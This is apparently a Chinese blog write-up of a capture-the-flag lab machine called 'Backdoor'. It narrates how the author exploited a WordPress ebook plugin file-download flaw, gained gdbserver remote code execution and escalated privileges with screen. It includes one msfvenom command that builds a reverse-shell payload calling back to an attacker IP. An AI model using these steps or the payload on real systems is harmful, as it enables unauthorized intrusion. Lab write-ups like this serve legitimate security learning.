Backdoor


对靶机进行信息收集

发现是由WordPress 5.8.1搭建

img

使用wpscan看一下有没有漏洞

img

img

没有找到漏洞只看到了一个管理员账号admin

img

使用searchsploit工具扫描后发现有三个插件有漏洞,但是我们没有办法确定靶机里面有没有这三个插件

访问content/plugins看看,发现了ebook插件

img

发现这个插件是任意插件下载漏洞,下载配置文件

img

查看配置文件发现了数据库账号和密码

img

下载进程看看有没有异常进程

这个嘛我找到了异常进程也知道了pid可是我通过插件的任意文件下载漏洞下载出了问题,也用burp跑了pid900-1000也没有办法跑出来

img

img

最后还是没有能下载或爆出来,然后看了一下国外大佬的writeup他们都是用脚跑的

这里有两个脚本

img

img

都可以试试

img

结果在814我说怎么用burp爆不出来

gdbserver有个RCE漏洞metsaploit模块里面有也可以使用脚本两种方法都可以

img

把payload改为x64的

进去后shell在根目录有个user.txt就有falg

第二种方法

使用msfconsole创建linux反弹木马

使用gdbserver的rce的exploit

脚本:https://www.exploit-db.com/exploits/50539

msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.3 LPORT=4444 PrependFork=true -o linux.bin

img

img

利用python建立交互shell

img

利用screen提权

img

提权语句

img

img

两种方法的提权方法都是screen提权

有问题可以问我哦,或者我那里出来问题麻烦你帮我指出来谢谢

QQ:195744492


文章作者: Pikachu
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 Pikachu !
作者: Pikachu
  目录